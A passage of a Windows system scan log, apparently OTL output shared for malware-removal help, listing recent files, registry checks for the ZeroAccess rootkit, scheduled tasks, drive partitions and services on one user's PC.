[2015/04/15 04:37:38 | 000,800,768 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ieapfltr.dll
[2015/04/15 04:37:38 | 000,710,144 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\ieapfltr.dll
[2015/04/15 04:36:49 | 002,373,632 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wucltux.dll
[2015/04/15 04:36:49 | 000,133,256 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuauclt.exe
[2015/04/15 04:36:48 | 000,891,392 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuapi.dll
[2015/04/15 04:36:48 | 000,721,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuapi.dll
[2015/04/15 04:36:48 | 000,408,064 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\WUSettingsProvider.dll
[2015/04/15 04:36:48 | 000,267,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\WinSetupUI.dll
[2015/04/15 04:36:48 | 000,200,192 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\storewuauth.dll
[2015/04/15 04:36:48 | 000,066,048 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wups.dll
[2015/04/15 04:36:48 | 000,052,224 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wups2.dll
[2015/04/15 04:36:48 | 000,015,360 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wu.upgrade.ps.dll
[2015/04/15 04:36:47 | 000,140,288 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuwebv.dll
[2015/04/15 04:36:47 | 000,124,928 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuwebv.dll
[2015/04/15 04:36:47 | 000,095,744 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wudriver.dll
[2015/04/15 04:36:47 | 000,081,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wudriver.dll
[2015/04/15 04:36:47 | 000,035,840 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuapp.exe
[2015/04/15 04:36:47 | 000,029,696 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuapp.exe
[2015/04/15 04:36:47 | 000,027,136 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wups.dll
[2015/04/15 04:36:31 | 000,377,152 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\drivers\clfs.sys
[2015/04/15 04:36:31 | 000,075,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\clfsw32.dll
[2015/04/15 04:36:31 | 000,058,880 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\clfsw32.dll
[2015/04/15 04:36:29 | 001,111,552 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aeinv.dll
[2015/04/15 04:36:29 | 000,957,440 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\appraiser.dll
[2015/04/15 04:36:29 | 000,769,024 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\invagent.dll
[2015/04/15 04:36:29 | 000,726,528 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\generaltel.dll
[2015/04/15 04:36:29 | 000,419,328 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\devinv.dll
[2015/04/15 04:36:29 | 000,227,328 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepdu.dll
[2015/04/15 04:36:29 | 000,192,000 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepic.dll
[2015/04/15 04:36:29 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\acmigration.dll
[2015/04/12 01:37:12 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Apple Computer
[2015/04/10 17:53:01 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Apple
[2015/04/04 21:24:54 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Malwarebytes
[2015/04/04 21:24:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes' Anti-Malware
[2015/04/04 21:24:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2015/04/04 21:24:36 | 000,025,928 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\mbam.sys
[2015/04/04 21:24:36 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware
[2015/04/04 21:21:57 | 010,285,040 | ---- | C] (Malwarebytes Corporation ) -- C:\Users\ryota\Desktop\mbam-setup-1.75.0.1300.exe
[2015/04/04 19:35:46 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Adobe
[2015/04/04 19:27:38 | 000,000,000 | ---D | C] -- C:\Users\ryota\Tracing
[2015/04/04 18:34:25 | 000,000,000 | --SD | C] -- C:\WINDOWS\SysWow64\GWX
[2015/04/04 18:34:25 | 000,000,000 | --SD | C] -- C:\WINDOWS\SysNative\GWX
[2015/04/04 18:11:11 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\Mario Story (J) [!]
[2015/04/04 18:08:59 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JWord(日本語キーワード)
[2015/04/04 17:31:07 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Geek Uninstaller
[2015/04/04 16:36:25 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\geek
[2015/04/04 16:33:36 | 000,050,688 | ---- | C] (Atribune.org) -- C:\Users\ryota\Desktop\ATF-Cleaner (1).exe
[2015/02/02 23:25:12 | 000,782,480 | ---- | C] (Neople inc) -- C:\Users\ryota\AppData\Local\AradIns.exe
[2015/02/02 23:24:38 | 000,584,336 | ---- | C] (Neople inc) -- C:\Users\ryota\AppData\Local\NeopleCustomURLStarter.exe
[4 C:\WINDOWS\SysWow64\*.tmp files -> C:\WINDOWS\SysWow64\*.tmp -> ]
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]

[2015/04/21 01:45:52 | 000,067,584 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2015/04/21 01:43:44 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys
[2015/04/21 01:43:39 | 2474,680,319 | -HS- | M] () -- C:\hiberfil.sys
[2015/04/21 01:41:35 | 000,002,196 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/04/21 01:40:21 | 000,000,702 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/04/21 00:59:00 | 000,000,706 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2015/04/21 00:48:00 | 000,000,626 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2015/04/20 22:35:30 | 000,000,020 | ---- | M] () -- C:\Users\ryota\AppData\Roaming\appdataFr3.bin
[2015/04/20 21:58:27 | 000,001,140 | ---- | M] () -- C:\Users\Public\Desktop\herdProtect.lnk
[2015/04/20 21:57:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe
[2015/04/20 21:54:14 | 002,873,112 | ---- | M] (Reason Company Software Inc.) -- C:\Users\ryota\Desktop\herdProtectScan_Setup.exe
[2015/04/18 19:31:33 | 001,496,524 | ---- | M] () -- C:\WINDOWS\SysNative\PerfStringBackup.INI
[2015/04/18 19:31:33 | 000,722,278 | ---- | M] () -- C:\WINDOWS\SysNative\perfh009.dat
[2015/04/18 19:31:33 | 000,499,650 | ---- | M] () -- C:\WINDOWS\SysNative\perfh011.dat
[2015/04/18 19:31:33 | 000,135,458 | ---- | M] () -- C:\WINDOWS\SysNative\perfc011.dat
[2015/04/18 19:31:33 | 000,135,394 | ---- | M] () -- C:\WINDOWS\SysNative\perfc009.dat
[2015/04/16 05:31:51 | 000,215,552 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msclmd.dll
[2015/04/16 05:31:51 | 000,195,072 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\msclmd.dll
[2015/04/14 08:24:21 | 000,792,056 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
[2015/04/14 08:24:21 | 000,178,168 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
[2015/04/04 21:39:57 | 000,001,132 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/04/04 21:23:16 | 010,285,040 | ---- | M] (Malwarebytes Corporation ) -- C:\Users\ryota\Desktop\mbam-setup-1.75.0.1300.exe
[2015/04/04 19:51:47 | 000,001,098 | ---- | M] () -- C:\Users\ryota\Application Data\Microsoft\Internet Explorer\Quick Launch\WorldofTanks.lnk
[2015/04/04 19:43:00 | 000,000,310 | ---- | M] () -- C:\WINDOWS\tasks\Price Meter Updater.job
[2015/04/04 19:25:29 | 000,001,170 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2015/04/04 16:38:09 | 000,000,841 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/04/04 16:33:39 | 000,050,688 | ---- | M] (Atribune.org) -- C:\Users\ryota\Desktop\ATF-Cleaner (1).exe
[2015/03/24 06:59:25 | 001,733,952 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntdll.dll
[2015/03/24 06:59:25 | 000,360,480 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\sechost.dll
[2015/03/24 06:59:00 | 007,476,032 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntoskrnl.exe
[2015/03/23 07:45:41 | 000,227,328 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepdu.dll
[2015/03/23 07:09:23 | 000,726,528 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\generaltel.dll
[2015/03/23 07:09:22 | 001,111,552 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aeinv.dll
[2015/03/23 07:09:22 | 000,957,440 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\appraiser.dll
[2015/03/23 07:09:22 | 000,769,024 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\invagent.dll
[2015/03/23 07:09:22 | 000,419,328 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\devinv.dll
[2015/03/23 07:09:22 | 000,030,720 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\acmigration.dll
[4 C:\WINDOWS\SysWow64\*.tmp files -> C:\WINDOWS\SysWow64\*.tmp -> ]
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

[color=#E56717]========== Files Created - No Company Name ==========[/color]

[2015/04/20 21:58:27 | 000,001,140 | ---- | C] () -- C:\Users\Public\Desktop\herdProtect.lnk
[2015/04/15 04:37:38 | 000,016,303 | ---- | C] () -- C:\WINDOWS\SysWow64\ieuinit.inf
[2015/04/15 04:37:38 | 000,016,303 | ---- | C] () -- C:\WINDOWS\SysNative\ieuinit.inf
[2015/04/04 21:24:37 | 000,001,132 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/03/15 00:01:07 | 000,107,008 | ---- | C] () -- C:\WINDOWS\SysWow64\OEMLicense.dll
[2015/03/14 23:59:54 | 000,046,080 | ---- | C] () -- C:\WINDOWS\SysWow64\BWContextHandler.dll
[2015/03/02 14:09:57 | 000,000,020 | ---- | C] () -- C:\Users\ryota\AppData\Roaming\appdataFr3.bin
[2014/11/19 17:11:37 | 000,000,242 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014/10/01 19:54:10 | 000,183,808 | ---- | C] () -- C:\WINDOWS\SysWow64\igdde32.dll
[2014/10/01 19:54:10 | 000,143,360 | ---- | C] () -- C:\WINDOWS\SysWow64\igdail32.dll
[2014/09/24 15:58:21 | 000,002,255 | ---- | C] () -- C:\WINDOWS\SysWow64\WimBootCompress.ini
[2014/02/15 00:25:26 | 000,645,632 | ---- | C] () -- C:\WINDOWS\SysWow64\xvidcore.dll
[2014/02/15 00:25:26 | 000,240,640 | ---- | C] () -- C:\WINDOWS\SysWow64\xvidvfw.dll
[2014/02/15 00:25:25 | 000,079,360 | ---- | C] () -- C:\WINDOWS\SysWow64\ff_vfw.dll
[2014/02/15 00:25:17 | 000,178,688 | ---- | C] () -- C:\WINDOWS\SysWow64\unrar.dll
[2014/02/15 00:25:15 | 000,715,038 | ---- | C] () -- C:\WINDOWS\unins000.exe
[2014/02/15 00:25:15 | 000,216,064 | ---- | C] ( ) -- C:\WINDOWS\SysWow64\lagarith.dll
[2014/02/15 00:25:15 | 000,001,990 | ---- | C] () -- C:\WINDOWS\unins000.dat
[2013/10/28 17:28:07 | 000,188,416 | ---- | C] () -- C:\WINDOWS\SysWow64\utv_core.dll
[2013/10/28 17:28:07 | 000,069,632 | ---- | C] () -- C:\WINDOWS\SysWow64\utv_vcm.dll
[2013/09/15 16:04:47 | 000,000,189 | ---- | C] () -- C:\Users\ryota\AppData\Roaming\WB.CFG
[2013/08/23 00:36:43 | 000,215,943 | ---- | C] () -- C:\WINDOWS\SysWow64\dssec.dat
[2013/08/23 00:36:42 | 000,000,741 | ---- | C] () -- C:\WINDOWS\SysWow64\NOISE.DAT
[2013/08/22 23:46:23 | 000,067,584 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2013/08/22 16:01:23 | 000,043,131 | ---- | C] () -- C:\WINDOWS\mib.bin
[2013/08/22 08:55:20 | 000,364,544 | ---- | C] () -- C:\WINDOWS\SysWow64\msjetoledb40.dll
[2013/08/22 08:52:39 | 000,673,088 | ---- | C] () -- C:\WINDOWS\SysWow64\mlang.dat
[2012/12/18 00:56:03 | 001,161,682 | ---- | C] () -- C:\Users\ryota\記録されたゲーム - 17-12-2012 10`00`02.mgx
[2012/12/13 15:28:00 | 012,706,828 | ---- | C] () -- C:\Users\ryota\03 Another Heaven.mp3
[2012/12/13 15:28:00 | 010,296,232 | ---- | C] () -- C:\Users\ryota\06 Ｋａｌｅｉｄｏｓｃｏｐｅ（ｔｒａｎｓｐａｒｅｎｔ　ｍｉｘ｜Ｂｏｎｕｓ　Ｔｒａｃｋ）.mp3
[2012/12/13 15:28:00 | 009,962,152 | ---- | C] () -- C:\Users\ryota\05 ARCADIA-Instrumental-.mp3
[2012/12/13 15:28:00 | 009,877,588 | ---- | C] () -- C:\Users\ryota\02 HORIZON.mp3
[2012/12/13 15:28:00 | 009,842,092 | ---- | C] () -- C:\Users\ryota\01 ARCADIA.mp3
[2012/12/13 15:28:00 | 003,751,396 | ---- | C] () -- C:\Users\ryota\04 ARCADIA-game Ver.-.mp3
[2012/10/31 18:22:16 | 000,003,077 | ---- | C] () -- C:\ProgramData\cfSB1290.ini

[color=#E56717]========== ZeroAccess Check ==========[/color]

[2015/04/20 22:45:57 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2015/02/13 02:40:58 | 022,291,584 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2015/02/13 02:34:06 | 019,731,824 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2014/10/29 10:19:43 | 001,013,760 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2014/10/29 09:59:23 | 000,786,944 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2014/10/29 10:16:01 | 000,512,512 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

[color=#E56717]========== Custom Scans ==========[/color]

[color=#A23BEC]< %windir%\tasks\*.job >[/color]
[2015/04/21 00:48:00 | 000,000,626 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2015/04/21 01:40:21 | 000,000,702 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/04/21 00:59:00 | 000,000,706 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2015/04/04 19:43:00 | 000,000,310 | ---- | M] () -- C:\WINDOWS\tasks\Price Meter Updater.job

[color=#E56717]========== Drive Information ==========[/color]

Physical Drives
---------------

Drive: \\\\.\\PHYSICALDRIVE0 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: WDC WD5000AAKX-00ERMA0
Partitions: 5
Status: OK
Status Info: 0

Drive: \\\\.\\PHYSICALDRIVE1 -
Interface type: USB
Media Type:
Model: Multi Flash Reader USB Device
Partitions: 0
Status: OK
Status Info: 0

Partitions
---------------

DeviceID: Disk #0, Partition #0
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 300.00MB
Starting Offset: 1048576
Hidden sectors: 0


DeviceID: Disk #0, Partition #1
PartitionType: GPT: System
Bootable: True
BootPartition: True
PrimaryPartition: True
Size: 100.00MB
Starting Offset: 315621376
Hidden sectors: 0


DeviceID: Disk #0, Partition #2
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 8.00GB
Starting Offset: 554696704
Hidden sectors: 0


DeviceID: Disk #0, Partition #3
PartitionType: GPT: Basic Data
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 457.00GB
Starting Offset: 8943304704
Hidden sectors: 0


DeviceID: Disk #0, Partition #4
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 456.00MB
Starting Offset: 499629686784
Hidden sectors: 0


[color=#E56717]========== Base Services ==========[/color]
SRV:[b]64bit:[/b] - [2014/10/29 11:42:20 | 000,214,528 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:44:33 | 000,110,080 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:[b]64bit:[/b] - [2014/10/29 10:21:02 | 000,096,768 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:34 | 000,933,376 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:40 | 000,845,312 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:40 | 000,062,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV - [2014/10/29 10:01:27 | 000,046,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\keyiso.dll -- (KeyIso)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:28 | 000,516,608 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2014/10/29 09:55:10 | 000,367,616 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:50 | 000,135,168 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:[b]64bit:[/b] - [2014/10/29 10:27:24 | 000,131,584 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:29 | 000,817,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:06 | 000,365,056 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2014/10/29 10:05:58 | 000,292,864 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:41 | 000,252,416 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:[b]64bit:[/b] - [2014/10/29 10:14:35 | 000,110,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\eapsvc.dll -- (Eaphost)
SRV:[b]64bit:[/b] - [2014/10/29 11:44:23 | 000,033,792 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2014/10/29 10:59:46 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:[b]64bit:[/b] - [2014/10/29 10:07:58 | 000,452,608 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:[b]64bit:[/b] - [2014/10/29 10:08:58 | 000,397,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
No service found with a name of MsMpSvc
No service found with a name of NisSrv
SRV:[b]64bit:[/b] - [2014/10/29 10:01:45 | 000,706,048 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:44 | 000,071,168 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:[b]64bit:[/b] - [2014/10/29 09:51:03 | 000,266,752 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:20 | 000,550,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/12/06 10:41:58 | 000,391,680 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:16 | 000,028,672 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:[b]64bit:[/b] - [2014/10/29 11:45:24 | 000,116,736 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:[b]64bit:[/b] - [2014/10/29 09:54:15 | 000,827,392 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
No service found with a name of ProtectedStorage
No service found with a name of EMDMgmt
SRV:[b]64bit:[/b] - [2014/10/29 11:34:42 | 000,102,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:[b]64bit:[/b] - [2014/10/29 09:59:21 | 000,542,208 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:29 | 000,817,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:25 | 000,031,744 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:[b]64bit:[/b] - [2014/10/29 12:51:48 | 000,047,024 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:[b]64bit:[/b] - [2014/10/29 09:56:06 | 000,146,944 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:18:49 | 000,329,216 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:[b]64bit:[/b] - [2014/10/29 10:04:06 | 000,640,000 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2014/10/29 09:49:09 | 000,576,512 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:[b]64bit:[/b] - [2014/10/29 09:52:52 | 001,265,152 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:[b]64bit:[/b] - [2014/10/29 11:12:14 | 000,313,344 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2014/10/29 10:34:59 | 000,254,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:29 | 000,059,392 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:[b]64bit:[/b] - [2014/12/09 10:50:34 | 000,225,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:59:28 | 001,454,080 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:[b]64bit:[/b] - [2014/10/29 10:02:48 | 000,911,360 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\audiosrv.dll -- (Audiosrv)
SRV:[b]64bit:[/b] - [2014/12/06 10:35:00 | 000,229,888 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
No service found with a name of SDRSVC
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,023,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:[b]64bit:[/b] - [2014/10/29 10:16:27 | 001,696,256 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (EventLog)
SRV:[b]64bit:[/b] - [2014/10/29 10:02:44 | 000,880,640 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:59:24 | 000,670,720 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:35:14 | 000,064,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\msiexec.exe -- (msiserver)
SRV - [2014/10/29 10:52:53 | 000,059,904 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysWow64\msiexec.exe -- (msiserver)
